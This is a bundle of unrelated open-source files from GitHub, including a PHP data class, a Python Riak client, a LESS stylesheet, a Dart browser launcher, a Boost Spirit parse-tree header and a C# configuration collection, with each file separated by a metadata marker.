	 *
	 * Note: Magic __get does not allow recursive calls. This can be tricky because the error generated by recursing into
	 * __get is "Undefined property: {CLASS}::{PROPERTY}" which is misleading. This is relevant for this class because
	 * requesting a non-visible property can trigger a call to a sub-function. If that references the property directly in
	 * the object, it will cause a recursion into __get.
	 *
	 * @param   string  $property  The name of the data property.
	 *
	 * @return  mixed  The value of the data property, or null if the data property does not exist.
	 *
	 * @see     JData::getProperty()
	 * @since   12.3
	 */
	public function __get($property)
	{
		return $this->getProperty($property);
	}
	/**
	 * The magic isset method is used to check the state of an object property.
	 *
	 * @param   string  $property  The name of the data property.
	 *
	 * @return  boolean  True if set, otherwise false is returned.
	 *
	 * @since   12.3
	 */
	public function __isset($property)
	{
		return isset($this->_properties[$property]);
	}
	/**
	 * The magic set method is used to set a data property.
	 *
	 * This is a public proxy for the protected setProperty method.
	 *
	 * @param   string  $property  The name of the data property.
	 * @param   mixed   $value     The value to give the data property.
	 *
	 * @return  void
	 *
	 * @see     JData::setProperty()
	 * @since   12.3
	 */
	public function __set($property, $value)
	{
		$this->setProperty($property, $value);
	}
	/**
	 * The magic unset method is used to unset a data property.
	 *
	 * @param   string  $property  The name of the data property.
	 *
	 * @return  void
	 *
	 * @since   12.3
	 */
	public function __unset($property)
	{
		unset($this->_properties[$property]);
	}
	/**
	 * Binds an array or object to this object.
	 *
	 * @param   mixed    $properties   An associative array of properties or an object.
	 * @param   boolean  $updateNulls  True to bind null values, false to ignore null values.
	 *
	 * @return  JData  Returns itself to allow chaining.
	 *
	 * @since   12.3
	 * @throws  InvalidArgumentException  If $properties is neither an array nor an object.
	 */
	public function bind($properties, $updateNulls = true)
	{
		// Check the properties data type.
		if (!is_array($properties) && !is_object($properties))
		{
			throw new InvalidArgumentException(sprintf('%s(%s)', __METHOD__, gettype($properties)));
		}
		// Check if the object is traversable.
		if ($properties instanceof Traversable)
		{
			// Convert iterator to array.
			$properties = iterator_to_array($properties);
		}
		// Check if the object needs to be converted to an array.
		elseif (is_object($properties))
		{
			// Convert properties to an array.
			$properties = (array) $properties;
		}
		// Bind the properties.
		foreach ($properties as $property => $value)
		{
			// Check if the value is null and should be bound.
			if ($value === null && !$updateNulls)
			{
				continue;
			}
			// Set the property.
			$this->setProperty($property, $value);
		}
		return $this;
	}
	/**
	 * Dumps the data properties into a stdClass object, recursively if appropriate.
	 *
	 * @param   integer           $depth   The maximum depth of recursion (default = 3).
	 *                                     For example, a depth of 0 will return a stdClass with all the properties in native
	 *                                     form. A depth of 1 will recurse into the first level of properties only.
	 * @param   SplObjectStorage  $dumped  A storage of already dumped objects that is used to avoid infinite loops.
	 *
	 * @return  stdClass  The data properties as a simple PHP stdClass object.
	 *
	 * @since   12.3
	 */
	public function dump($depth = 3, SplObjectStorage $dumped = null)
	{
		// Check if we should initialise the recursion tracker.
		if ($dumped === null)
		{
			$dumped = new SplObjectStorage;
		}
		// Add this object to the dumped stack so it is never dumped twice.
		$dumped->attach($this);
		// Setup a container.
		$dump = new stdClass;
		// Dump all object properties.
		foreach (array_keys($this->_properties) as $property)
		{
			// Get the property.
			$dump->$property = $this->dumpProperty($property, $depth, $dumped);
		}
		return $dump;
	}
	/**
	 * Gets this object represented as an ArrayIterator.
	 *
	 * This allows the data properties to be access via a foreach statement.
	 * Note that the properties are dumped at depth 0, i.e. in native form.
	 *
	 * @return  ArrayIterator  This object represented as an ArrayIterator.
	 *
	 * @see     IteratorAggregate::getIterator()
	 * @since   12.3
	 */
	public function getIterator()
	{
		return new ArrayIterator($this->dump(0));
	}
	/**
	 * Gets the data properties in a form that can be serialised to JSON format.
	 *
	 * @return  stdClass  The dumped property graph that json_encode() will serialise.
	 *
	 * @since   12.3
	 */
	public function jsonSerialize()
	{
		return $this->dump();
	}
	/**
	 * Dumps a data property.
	 *
	 * If recursion is set, this method will dump any object implementing JDumpable (like JData and JDataSet); it will
	 * convert a JDate object to a string; and it will convert a Registry to an object.
	 *
	 * @param   string            $property  The name of the data property.
	 * @param   integer           $depth     The current depth of recursion (a value of 0 will ignore recursion).
	 * @param   SplObjectStorage  $dumped    A storage of already dumped objects that is used to avoid infinite loops.
	 *
	 * @return  mixed  The value of the dumped property.
	 *
	 * @since   12.3
	 */
	protected function dumpProperty($property, $depth, SplObjectStorage $dumped)
	{
		$value = $this->getProperty($property);
		if ($depth > 0)
		{
			// Check if the object is also an dumpable object.
			if ($value instanceof JDataDumpable)
			{
				// Do not dump the property if it has already been dumped.
				if (!$dumped->contains($value))
				{
					$value = $value->dump($depth - 1, $dumped);
				}
			}
			// Check if the object is a date.
			if ($value instanceof JDate)
			{
				$value = (string) $value;
			}
			// Check if the object is a registry.
			elseif ($value instanceof Registry)
			{
				$value = $value->toObject();
			}
		}
		return $value;
	}
	/**
	 * Gets a data property.
	 *
	 * @param   string  $property  The name of the data property.
	 *
	 * @return  mixed  The value of the data property, or null when it does not exist.
	 *
	 * @see     JData::__get()
	 * @since   12.3
	 */
	protected function getProperty($property)
	{
		// Get the raw value.
		$value = array_key_exists($property, $this->_properties) ? $this->_properties[$property] : null;
		return $value;
	}
	/**
	 * Sets a data property.
	 *
	 * If the name of the property starts with a null byte, this method will return null.
	 *
	 * @param   string  $property  The name of the data property.
	 * @param   mixed   $value     The value to give the data property.
	 *
	 * @return  mixed  The value of the data property, or null when the name was rejected.
	 *
	 * @see     JData::__set()
	 * @since   12.3
	 */
	protected function setProperty($property, $value)
	{
		/*
		 * Check if the property starts with a null byte. If so, discard it because a later attempt to try to access it
		 * can cause a fatal error. See http://us3.php.net/manual/en/language.types.array.php#language.types.array.casting
		 */
		if (strpos($property, "\0") === 0)
		{
			return null;
		}
		// Set the value.
		$this->_properties[$property] = $value;
		return $value;
	}
	/**
	 * Count the number of data properties.
	 *
	 * @return  integer  The number of data properties.
	 *
	 * @since   12.3
	 */
	public function count()
	{
		return count($this->_properties);
	}
}
| {
"pile_set_name": "Github"
} |
# Copyright 2010-present Basho Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import simplejson as json
except ImportError:
import json
import random
from weakref import WeakValueDictionary
from riak.client.operations import RiakClientOperations
from riak.node import RiakNode
from riak.bucket import RiakBucket, BucketType
from riak.mapreduce import RiakMapReduceChain
from riak.resolver import default_resolver
from riak.table import Table
from riak.transports.http import HttpPool
from riak.transports.tcp import TcpPool
from riak.security import SecurityCreds
from riak.util import lazy_property, bytes_to_str, str_to_bytes
from six import string_types, PY2
from riak.client.multi import MultiGetPool, MultiPutPool
def default_encoder(obj):
    """
    Default encoder for JSON datatypes: produces UTF-8 encoded JSON bytes
    instead of the default bloated backslash-uXXXX escaped ASCII strings.
    Byte-string input is first converted to text before serialisation.
    """
    value = bytes_to_str(obj) if isinstance(obj, bytes) else obj
    return json.dumps(value, ensure_ascii=False).encode("utf-8")
def binary_json_encoder(obj):
    """
    Encoder for JSON datatypes on Python 3: returns UTF-8 encoded JSON
    bytes rather than ASCII with backslash-uXXXX escapes. Byte strings
    are decoded to text before being serialised.
    """
    if isinstance(obj, bytes):
        obj = bytes_to_str(obj)
    return json.dumps(obj, ensure_ascii=False).encode("utf-8")
def binary_json_decoder(obj):
    """
    Decode JSON supplied as raw bytes into native Python values.
    """
    text = bytes_to_str(obj)
    return json.loads(text)
def binary_encoder_decoder(obj):
    """
    Identity codec: the value is assumed to already be in binary form,
    so it is passed through unchanged.
    """
    return obj
class RiakClient(RiakMapReduceChain, RiakClientOperations):
    """
    The ``RiakClient`` object holds information necessary to connect
    to Riak. Requests can be made to Riak directly through the client
    or by using the methods on related objects.
    """
    #: The supported protocols
    PROTOCOLS = ['http', 'pbc']

    def __init__(self, protocol='pbc', transport_options=None,
                 nodes=None, credentials=None,
                 multiget_pool_size=None, multiput_pool_size=None,
                 **kwargs):
        """
        Construct a new ``RiakClient`` object.

        :param protocol: the preferred protocol, defaults to 'pbc'
        :type protocol: string
        :param nodes: a list of node configurations,
           where each configuration is a dict containing the keys
           'host', 'http_port', and 'pb_port'
        :type nodes: list
        :param transport_options: Optional key-value args to pass to
           the transport constructor (defaults to an empty dict)
        :type transport_options: dict
        :param credentials: optional object of security info
        :type credentials: :class:`~riak.security.SecurityCreds` or dict
        :param multiget_pool_size: the number of threads to use in
           :meth:`multiget` operations. Defaults to a factor of the number of
           CPUs in the system
        :type multiget_pool_size: int
        :param multiput_pool_size: the number of threads to use in
           :meth:`multiput` operations. Defaults to a factor of the number of
           CPUs in the system
        :type multiput_pool_size: int
        """
        kwargs = kwargs.copy()
        # Use a per-instance dict: a mutable default argument ({}) would be
        # shared between every client constructed without this option.
        if transport_options is None:
            transport_options = {}
        if nodes is None:
            self.nodes = [self._create_node(kwargs), ]
        else:
            self.nodes = [self._create_node(n) for n in nodes]
        self._multiget_pool_size = multiget_pool_size
        self._multiput_pool_size = multiput_pool_size
        self.protocol = protocol or 'pbc'
        self._resolver = None
        self._credentials = self._create_credentials(credentials)
        self._http_pool = HttpPool(self, **transport_options)
        self._tcp_pool = TcpPool(self, **transport_options)
        self._closed = False
        if PY2:
            self._encoders = {'application/json': default_encoder,
                              'text/json': default_encoder,
                              'text/plain': str}
            self._decoders = {'application/json': json.loads,
                              'text/json': json.loads,
                              'text/plain': str}
        else:
            self._encoders = {'application/json': binary_json_encoder,
                              'text/json': binary_json_encoder,
                              'text/plain': str_to_bytes,
                              'binary/octet-stream': binary_encoder_decoder}
            self._decoders = {'application/json': binary_json_decoder,
                              'text/json': binary_json_decoder,
                              'text/plain': bytes_to_str,
                              'binary/octet-stream': binary_encoder_decoder}
        # Weak caches so repeated lookups return the same wrapper objects
        # without keeping them alive forever.
        self._buckets = WeakValueDictionary()
        self._bucket_types = WeakValueDictionary()
        self._tables = WeakValueDictionary()

    def __del__(self):
        # Guard against a partially-constructed instance: if __init__ raised
        # before _closed was assigned, close() would hit an AttributeError.
        if getattr(self, '_closed', None) is not None:
            self.close()

    def _get_protocol(self):
        return self._protocol

    def _set_protocol(self, value):
        if value not in self.PROTOCOLS:
            raise ValueError("protocol option is invalid, must be one of %s" %
                             repr(self.PROTOCOLS))
        self._protocol = value

    protocol = property(_get_protocol, _set_protocol,
                        doc="""
                        Which protocol to prefer, one of
                        :attr:`PROTOCOLS
                        <riak.client.RiakClient.PROTOCOLS>`. Please
                        note that when one protocol is selected, the
                        other protocols MAY NOT attempt to connect.
                        Changing to another protocol will cause a
                        connection on the next request.
                        Some requests are only valid over ``'http'``,
                        and will always be sent via
                        those transports, regardless of which protocol
                        is preferred.
                        """)

    def _get_resolver(self):
        return self._resolver or default_resolver

    def _set_resolver(self, value):
        if value is None or callable(value):
            self._resolver = value
        else:
            raise TypeError("resolver is not a function")

    resolver = property(_get_resolver, _set_resolver,
                        doc=""" The sibling-resolution function for this client.
                        Defaults to :func:`riak.resolver.default_resolver`.""")

    def _get_client_id(self):
        with self._transport() as transport:
            return transport.client_id

    def _set_client_id(self, client_id):
        # Propagate the id to every pooled connection of both transports.
        for http in self._http_pool:
            http.client_id = client_id
        for pb in self._tcp_pool:
            pb.client_id = client_id

    client_id = property(_get_client_id, _set_client_id,
                         doc="""The client ID for this client instance""")

    def get_encoder(self, content_type):
        """
        Get the encoding function for the provided content type.

        :param content_type: the requested media type
        :type content_type: str
        :rtype: function
        """
        return self._encoders.get(content_type)

    def set_encoder(self, content_type, encoder):
        """
        Set the encoding function for the provided content type.

        :param content_type: the requested media type
        :type content_type: str
        :param encoder: an encoding function, takes a single object
            argument and returns encoded data
        :type encoder: function
        """
        self._encoders[content_type] = encoder

    def get_decoder(self, content_type):
        """
        Get the decoding function for the provided content type.

        :param content_type: the requested media type
        :type content_type: str
        :rtype: function
        """
        return self._decoders.get(content_type)

    def set_decoder(self, content_type, decoder):
        """
        Set the decoding function for the provided content type.

        :param content_type: the requested media type
        :type content_type: str
        :param decoder: a decoding function, takes encoded data and
            returns a Python type
        :type decoder: function
        """
        self._decoders[content_type] = decoder

    def bucket(self, name, bucket_type='default'):
        """
        Get the bucket by the specified name. Since buckets always exist,
        this will always return a
        :class:`RiakBucket <riak.bucket.RiakBucket>`.

        If you are using a bucket that is contained in a bucket type, it is
        preferable to access it from the bucket type object::

            # Preferred:
            client.bucket_type("foo").bucket("bar")

            # Equivalent, but not preferred:
            client.bucket("bar", bucket_type="foo")

        :param name: the bucket name
        :type name: str
        :param bucket_type: the parent bucket-type
        :type bucket_type: :class:`BucketType <riak.bucket.BucketType>`
             or str
        :rtype: :class:`RiakBucket <riak.bucket.RiakBucket>`
        """
        if not isinstance(name, string_types):
            raise TypeError('Bucket name must be a string')
        if isinstance(bucket_type, string_types):
            bucket_type = self.bucket_type(bucket_type)
        elif not isinstance(bucket_type, BucketType):
            raise TypeError('bucket_type must be a string '
                            'or riak.bucket.BucketType')
        b = RiakBucket(self, name, bucket_type)
        return self._setdefault_handle_none(
            self._buckets, (bucket_type, name), b)

    def bucket_type(self, name):
        """
        Gets the bucket-type by the specified name. Bucket-types do
        not always exist (unlike buckets), but this will always return
        a :class:`BucketType <riak.bucket.BucketType>` object.

        :param name: the bucket-type name
        :type name: str
        :rtype: :class:`BucketType <riak.bucket.BucketType>`
        """
        if not isinstance(name, string_types):
            raise TypeError('BucketType name must be a string')
        btype = BucketType(self, name)
        return self._setdefault_handle_none(
            self._bucket_types, name, btype)

    def table(self, name):
        """
        Gets the table by the specified name. Tables do
        not always exist (unlike buckets), but this will always return
        a :class:`Table <riak.table.Table>` object.

        :param name: the table name
        :type name: str
        :rtype: :class:`Table <riak.table.Table>`
        """
        if not isinstance(name, string_types):
            raise TypeError('Table name must be a string')
        if name in self._tables:
            return self._tables[name]
        else:
            table = Table(self, name)
            self._tables[name] = table
            return table

    def close(self):
        """
        Iterate through all of the connections and close each one.
        Safe to call more than once; subsequent calls are no-ops.
        """
        if not self._closed:
            self._closed = True
            self._stop_multi_pools()
            if self._http_pool is not None:
                self._http_pool.clear()
                self._http_pool = None
            if self._tcp_pool is not None:
                self._tcp_pool.clear()
                self._tcp_pool = None

    def _stop_multi_pools(self):
        # Stop and drop the lazily-created worker pools, if they exist.
        if self._multiget_pool:
            self._multiget_pool.stop()
            self._multiget_pool = None
        if self._multiput_pool:
            self._multiput_pool.stop()
            self._multiput_pool = None

    def _create_node(self, n):
        """
        Coerce a node specification (RiakNode, 3-tuple or dict) into a
        :class:`RiakNode <riak.node.RiakNode>`.
        """
        if isinstance(n, RiakNode):
            return n
        elif isinstance(n, tuple) and len(n) == 3:
            # NOTE: was `len(n) is 3`, an identity comparison that only
            # works by CPython's small-int caching and warns on Python 3.8+.
            host, http_port, pb_port = n
            return RiakNode(host=host,
                            http_port=http_port,
                            pb_port=pb_port)
        elif isinstance(n, dict):
            return RiakNode(**n)
        else:
            raise TypeError("%s is not a valid node configuration"
                            % repr(n))

    def _create_credentials(self, n):
        """
        Create security credentials, if necessary.
        """
        if not n:
            return n
        elif isinstance(n, SecurityCreds):
            return n
        elif isinstance(n, dict):
            return SecurityCreds(**n)
        else:
            raise TypeError("%s is not a valid security configuration"
                            % repr(n))

    def _choose_node(self, nodes=None):
        """
        Chooses a random node from the list of nodes in the client,
        taking into account each node's recent error rate.

        :rtype RiakNode
        """
        if not nodes:
            nodes = self.nodes

        # Prefer nodes which have gone a reasonable time without
        # errors
        def _error_rate(node):
            return node.error_rate.value()

        good = [n for n in nodes if _error_rate(n) < 0.1]
        if not good:
            # Fall back to a minimally broken node
            return min(nodes, key=_error_rate)
        else:
            return random.choice(good)

    def _setdefault_handle_none(self, wvdict, key, value):
        # TODO FIXME FUTURE
        # This is a workaround for Python issue 19542
        # http://bugs.python.org/issue19542
        rv = wvdict.setdefault(key, value)
        if rv is None:
            return value
        else:
            return rv

    @lazy_property
    def _multiget_pool(self):
        if self._multiget_pool_size:
            return MultiGetPool(self._multiget_pool_size)
        else:
            return None

    @lazy_property
    def _multiput_pool(self):
        if self._multiput_pool_size:
            return MultiPutPool(self._multiput_pool_size)
        else:
            return None

    def __hash__(self):
        return hash(frozenset([(n.host, n.http_port, n.pb_port)
                               for n in self.nodes]))

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return hash(self) == hash(other)
        else:
            return False

    def __ne__(self, other):
        if isinstance(other, self.__class__):
            return hash(self) != hash(other)
        else:
            return True
| {
"pile_set_name": "Github"
} |
//
// Jumbotron
// --------------------------------------------------
// Lightweight, flexible component for showcasing key marketing content.
.jumbotron {
  padding: @jumbotron-padding;
  margin-bottom: @jumbotron-padding;
  font-size: @jumbotron-font-size;
  font-weight: 200;
  line-height: (@line-height-base * 1.5);
  color: @jumbotron-color;
  background-color: @jumbotron-bg;
  h1,
  .h1 {
    line-height: 1;
    color: @jumbotron-heading-color;
  }
  p {
    line-height: 1.4;
  }
  .container & {
    border-radius: @border-radius-large; // Only round corners at higher resolutions if contained in a container
  }
  .container {
    max-width: 100%;
  }
  // Scale up padding and heading size on small-and-up viewports.
  @media screen and (min-width: @screen-sm-min) {
    padding-top: (@jumbotron-padding * 1.6);
    padding-bottom: (@jumbotron-padding * 1.6);
    .container & {
      padding-left: (@jumbotron-padding * 2);
      padding-right: (@jumbotron-padding * 2);
    }
    h1,
    .h1 {
      font-size: (@font-size-base * 4.5);
    }
  }
}
| {
"pile_set_name": "Github"
} |
#include "b.h"
// Minimal class holding a private pair of integers.
// NOTE(review): x and y are never initialized by the constructor — confirm
// callers do not rely on their values before assignment.
class foo {
public:
    foo() {}
    ~foo() {}

private:
    int x, y;
};
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2013, the Dart project authors. Please see the AUTHORS file
// for details. All rights reserved. Use of this source code is governed by a
// BSD-style license that can be found in the LICENSE file.
/// Simple command line interface to launching browsers.
/// Uses the browser_controller framework.
/// The usage is:
/// DARTBIN launch_browser.dart BROWSER_NAME URL
/// DARTBIN should be the checked in stable binary.
import 'package:test_runner/src/browser_controller.dart';
import 'package:test_runner/src/configuration.dart';
/// Prints command-line usage and the list of supported browsers.
void printHelp() {
  const header = "Usage pattern:";
  const usage = "launch_browser.dart browser url";
  print(header);
  print(usage);
  print("Supported browsers: ${Browser.supportedBrowsers}");
}
void main(List<String> arguments) {
  // Exactly two positional arguments are required: <browser name> <url>.
  if (arguments.length != 2) {
    print("Wrong number of arguments, please pass in exactly two arguments");
    printHelp();
    return;
  }
  var name = arguments[0];
  if (!Browser.supportedBrowser(name)) {
    print("Specified browser not supported");
    printHelp();
    return;
  }
  var runtime = Runtime.find(name);
  // Build a throwaway configuration; only the runtime matters here — it is
  // used below to resolve the browser executable's location.
  var configuration = TestConfiguration(
      configuration: Configuration(
          "dummy configuration", null, null, null, runtime, null));
  var executable = configuration.browserLocation;
  var browser = Browser.byRuntime(runtime, executable);
  // Launch the browser at the requested URL (fire and forget).
  browser.start(arguments[1]);
}
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2003 Daniel Nuffer
Copyright (c) 2001-2007 Hartmut Kaiser
http://spirit.sourceforge.net/
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#ifndef BOOST_SPIRIT_TREE_PARSE_TREE_HPP
#define BOOST_SPIRIT_TREE_PARSE_TREE_HPP
#include <boost/spirit/home/classic/namespace.hpp>
#include <boost/spirit/home/classic/tree/common.hpp>
#include <boost/spirit/home/classic/core/scanner/scanner.hpp>
#include <boost/spirit/home/classic/tree/parse_tree_fwd.hpp>
///////////////////////////////////////////////////////////////////////////////
namespace boost { namespace spirit {
BOOST_SPIRIT_CLASSIC_NAMESPACE_BEGIN
//////////////////////////////////
// pt_match_policy is simply an id so the correct specialization of tree_policy can be found.
// Match policy tag that selects parse-tree building behaviour. It exists
// so the correct specialization of tree_policy (pt_tree_policy, below) can
// be found via impl::tree_policy_selector; all actual match bookkeeping is
// inherited from common_tree_match_policy.
template <
    typename IteratorT,
    typename NodeFactoryT,
    typename T
>
struct pt_match_policy :
    public common_tree_match_policy<
        pt_match_policy<IteratorT, NodeFactoryT, T>,
        IteratorT,
        NodeFactoryT,
        pt_tree_policy<
            pt_match_policy<IteratorT, NodeFactoryT, T>,
            NodeFactoryT,
            T
        >,
        T
    >
{
    typedef
        common_tree_match_policy<
            pt_match_policy<IteratorT, NodeFactoryT, T>,
            IteratorT,
            NodeFactoryT,
            pt_tree_policy<
                pt_match_policy<IteratorT, NodeFactoryT, T>,
                NodeFactoryT,
                T
            >,
            T
        >
    common_tree_match_policy_;
    pt_match_policy()
    {
    }
    // Copy-convert from another scanner's policies (policy propagation).
    template <typename PolicyT>
    pt_match_policy(PolicyT const & policies)
        : common_tree_match_policy_(policies)
    {
    }
};
//////////////////////////////////
// Tree policy used when building full parse trees: every grouped match
// becomes a node and child matches are concatenated in order.
template <typename MatchPolicyT, typename NodeFactoryT, typename T>
struct pt_tree_policy :
    public common_tree_tree_policy<MatchPolicyT, NodeFactoryT>
{
    typedef typename MatchPolicyT::match_t match_t;
    typedef typename MatchPolicyT::iterator_t iterator_t;
    // Sequence composition: append b's trees after a's.
    template<typename MatchAT, typename MatchBT>
    static void concat(MatchAT& a, MatchBT const& b)
    {
        BOOST_SPIRIT_ASSERT(a && b);
        std::copy(b.trees.begin(), b.trees.end(),
            std::back_insert_iterator<typename match_t::container_t>(a.trees));
    }
    // Wrap m's current trees into a single new node spanning [first, last)
    // and stamp the rule id on the node and any not-yet-tagged children.
    template <typename MatchT, typename Iterator1T, typename Iterator2T>
    static void group_match(MatchT& m, parser_id const& id,
        Iterator1T const& first, Iterator2T const& last)
    {
        if (!m)
            return;
        typedef typename NodeFactoryT::template factory<iterator_t> factory_t;
        typedef typename tree_match<iterator_t, NodeFactoryT, T>::container_t
            container_t;
        typedef typename container_t::iterator cont_iterator_t;
        match_t newmatch(m.length(),
            factory_t::create_node(first, last, false));
        // Move (not copy) the existing children into the new root node.
        std::swap(newmatch.trees.begin()->children, m.trees);
        // set this node and all it's unset children's rule_id
        newmatch.trees.begin()->value.id(id);
        for (cont_iterator_t i = newmatch.trees.begin()->children.begin();
            i != newmatch.trees.begin()->children.end();
            ++i)
        {
            if (i->value.id() == 0)
                i->value.id(id);
        }
        m = newmatch;
    }
    // Apply a node functor (e.g. from a directive) to the whole match.
    template <typename FunctorT, typename MatchT>
    static void apply_op_to_match(FunctorT const& op, MatchT& m)
    {
        op(m);
    }
};
namespace impl {
    // Maps pt_match_policy onto its corresponding pt_tree_policy so the
    // shared tree machinery can look up the right policy type.
    template <typename IteratorT, typename NodeFactoryT, typename T>
    struct tree_policy_selector<pt_match_policy<IteratorT, NodeFactoryT, T> >
    {
        typedef pt_tree_policy<
            pt_match_policy<IteratorT, NodeFactoryT, T>,
            NodeFactoryT,
            T
        > type;
    };
} // namespace impl
//////////////////////////////////
struct gen_pt_node_parser_gen;
// Directive parser: re-parses its embedded subject with the scanner's
// match policy swapped for pt_match_policy, so the subject's matches
// generate parse-tree nodes regardless of the outer tree mode.
template <typename T>
struct gen_pt_node_parser
    : public unary<T, parser<gen_pt_node_parser<T> > >
{
    typedef gen_pt_node_parser<T> self_t;
    typedef gen_pt_node_parser_gen parser_generator_t;
    typedef unary_parser_category parser_category_t;
    gen_pt_node_parser(T const& a)
        : unary<T, parser<gen_pt_node_parser<T> > >(a) {}
    template <typename ScannerT>
    typename parser_result<self_t, ScannerT>::type
    parse(ScannerT const& scan) const
    {
        // Keep the iteration and action policies, replace only the match
        // policy with the parse-tree building one.
        typedef typename ScannerT::iteration_policy_t iteration_policy_t;
        typedef typename ScannerT::match_policy_t::iterator_t iterator_t;
        typedef typename ScannerT::match_policy_t::factory_t factory_t;
        typedef pt_match_policy<iterator_t, factory_t> match_policy_t;
        typedef typename ScannerT::action_policy_t action_policy_t;
        typedef scanner_policies<
            iteration_policy_t,
            match_policy_t,
            action_policy_t
        > policies_t;
        return this->subject().parse(scan.change_policies(policies_t(scan)));
    }
};
//////////////////////////////////
// Generator for gen_pt_node_parser; enables the gen_pt_node_d[p] directive
// syntax as well as explicit generate(p) calls.
struct gen_pt_node_parser_gen
{
    template <typename T>
    struct result {
        typedef gen_pt_node_parser<T> type;
    };
    template <typename T>
    static gen_pt_node_parser<T>
    generate(parser<T> const& s)
    {
        return gen_pt_node_parser<T>(s.derived());
    }
    template <typename T>
    gen_pt_node_parser<T>
    operator[](parser<T> const& s) const
    {
        return gen_pt_node_parser<T>(s.derived());
    }
};
// The gen_pt_node_d directive object: gen_pt_node_d[p] wraps parser p.
const gen_pt_node_parser_gen gen_pt_node_d = gen_pt_node_parser_gen();
///////////////////////////////////////////////////////////////////////////////
//
// Parse functions for parse trees
//
///////////////////////////////////////////////////////////////////////////////
// Parse [first_, last) with parser p, skipping with `skip`, building a
// parse tree whose nodes come from NodeFactoryT. The trailing dummy
// parameter only selects the factory type. Returns a tree_parse_info
// whose `full` flag is set when the whole input was consumed.
template <
    typename NodeFactoryT, typename IteratorT, typename ParserT,
    typename SkipT
>
inline tree_parse_info<IteratorT, NodeFactoryT>
pt_parse(
    IteratorT const& first_,
    IteratorT const& last,
    parser<ParserT> const& p,
    SkipT const& skip,
    NodeFactoryT const& /*dummy_*/ = NodeFactoryT())
{
    typedef skip_parser_iteration_policy<SkipT> iter_policy_t;
    typedef pt_match_policy<IteratorT, NodeFactoryT> pt_match_policy_t;
    typedef
        scanner_policies<iter_policy_t, pt_match_policy_t>
        scanner_policies_t;
    typedef scanner<IteratorT, scanner_policies_t> scanner_t;
    iter_policy_t iter_policy(skip);
    scanner_policies_t policies(iter_policy);
    // The scanner advances `first`; a local copy is needed because the
    // caller's iterator is taken by const reference.
    IteratorT first = first_;
    scanner_t scan(first, last, policies);
    tree_match<IteratorT, NodeFactoryT> hit = p.derived().parse(scan);
    return tree_parse_info<IteratorT, NodeFactoryT>(
        first, hit, hit && (first == last), hit.length(), hit.trees);
}
// Convenience overload: parse with a skip parser using the default
// node factory (node_val_data_factory<nil_t>).
template <typename IteratorT, typename ParserT, typename SkipT>
inline tree_parse_info<IteratorT>
pt_parse(
    IteratorT const& first,
    IteratorT const& last,
    parser<ParserT> const& p,
    SkipT const& skip)
{
    return pt_parse(first, last, p, skip, node_val_data_factory<nil_t>());
}
//////////////////////////////////
// Parse [first_, last) without a skip parser, building a parse tree with
// the default node factory.
template <typename IteratorT, typename ParserT>
inline tree_parse_info<IteratorT>
pt_parse(
    IteratorT const& first_,
    IteratorT const& last,
    parser<ParserT> const& parser)
{
    typedef pt_match_policy<IteratorT> pt_match_policy_t;
    // Copy the iterator: the scanner advances it as input is consumed.
    IteratorT first = first_;
    scanner<
        IteratorT,
        scanner_policies<iteration_policy, pt_match_policy_t>
    > scan(first, last);
    tree_match<IteratorT> hit = parser.derived().parse(scan);
    // "full" match <=> the parser succeeded and consumed all input.
    return tree_parse_info<IteratorT>(
        first, hit, hit && (first == last), hit.length(), hit.trees);
}
//////////////////////////////////
// Parse a null-terminated character string with a skip parser.
template <typename CharT, typename ParserT, typename SkipT>
inline tree_parse_info<CharT const*>
pt_parse(
    CharT const* str,
    parser<ParserT> const& p,
    SkipT const& skip)
{
    // Locate the terminating null to obtain the end iterator.
    CharT const* last = str;
    for (; *last; ++last)
    {
    }
    return pt_parse(str, last, p, skip);
}
//////////////////////////////////
// Parse a null-terminated character string without a skip parser.
template <typename CharT, typename ParserT>
inline tree_parse_info<CharT const*>
pt_parse(
    CharT const* str,
    parser<ParserT> const& parser)
{
    // Locate the terminating null to obtain the end iterator.
    CharT const* last = str;
    while (*last)
        ++last;
    return pt_parse(str, last, parser);
}
///////////////////////////////////////////////////////////////////////////////
BOOST_SPIRIT_CLASSIC_NAMESPACE_END
}} // namespace BOOST_SPIRIT_CLASSIC_NS
#endif
| {
"pile_set_name": "Github"
} |
There are many different ways to style code with GitHub's markdown. If you have inline code, wrap it in backticks: `var example = true`. If you've got a longer block of code, you can indent it with four spaces:
if (isAwesome) {
return true
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="colorPrimary">#3F51B5</color>
<color name="colorPrimaryDark">#303F9F</color>
<color name="colorAccent">#FF4081</color>
</resources>
| {
"pile_set_name": "Github"
} |
using System.Configuration;
namespace Rhino.ServiceBus.Config
{
    /// <summary>
    /// Configuration collection of <see cref="AssemblyElement"/> entries,
    /// keyed by the assembly name.
    /// </summary>
    [ConfigurationCollection(typeof(AssemblyElement), CollectionType = ConfigurationElementCollectionType.BasicMap)]
    public class AssemblyElementCollection : ConfigurationElementCollection
    {
        /// <summary>Creates a new, empty <see cref="AssemblyElement"/>.</summary>
        protected override ConfigurationElement CreateNewElement()
        {
            return new AssemblyElement();
        }

        /// <summary>Returns the key for an element: the assembly's name.</summary>
        protected override object GetElementKey(ConfigurationElement element)
        {
            var assemblyElement = (AssemblyElement)element;
            return assemblyElement.Name;
        }

        /// <summary>Adds an assembly entry to the collection.</summary>
        public void Add(AssemblyElement assembly)
        {
            BaseAdd(assembly);
        }
    }
} | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2014 MediaTek Inc.
* Author: James Liao <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
